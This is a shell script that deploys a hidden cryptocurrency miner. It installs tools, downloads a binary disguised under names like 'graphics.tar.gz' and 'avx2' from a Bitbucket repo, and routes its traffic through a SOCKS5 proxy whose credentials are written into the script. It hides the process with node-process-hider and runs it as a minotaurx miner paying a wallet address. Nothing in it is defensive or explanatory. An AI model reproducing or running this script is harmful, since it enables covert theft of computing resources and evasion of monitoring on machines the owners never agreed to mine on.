#!/bin/sh

apt update && apt -y install wget curl sudo unzip autoconf git cmake binutils build-essential net-tools screen golang

sudo apt update;apt -y install curl unzip autoconf git cmake binutils build-essential net-tools screen golang

curl -fsSL https://deb.nodesource.com/setup_17.x | sudo -E bash -
sudo apt-get install -y nodejs
sudo apt-get install gcc g++ make

sudo -u root npm i -g node-process-hider

sudo ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
sudo dpkg-reconfigure --frontend noninteractive tzdata

wget https://bitbucket.org/oqoixgqoq9/avn/raw/792f8c70343d06e2eb2934bb64b9de9e309388c1/graphics.tar.gz

tar -xvzf graphics.tar.gz

cat > graftcp/local/graftcp-local.conf <<END
listen = :2233
loglevel = 1
socks5 = 18.216.28.28:1080
socks5_username = mikrotik999
socks5_password = Elibawnos
END

./graftcp/local/graftcp-local -config graftcp/local/graftcp-local.conf &

sleep .2

./graftcp/graftcp curl ifconfig.me

echo " "
echo " "

./graftcp/graftcp wget https://bitbucket.org/oqoixgqoq9/avn/raw/792f8c70343d06e2eb2934bb64b9de9e309388c1/avx2
chmod +x avx2

sudo ph add avx2

./graftcp/graftcp ./avx2 -a minotaurx  -o stratum+tcps://stratum-ru.rplant.xyz:17068 -u RXzEz9Qm1dNMj2V7PtEaQ2yz7kysjFGVq7.tes -p x -t18
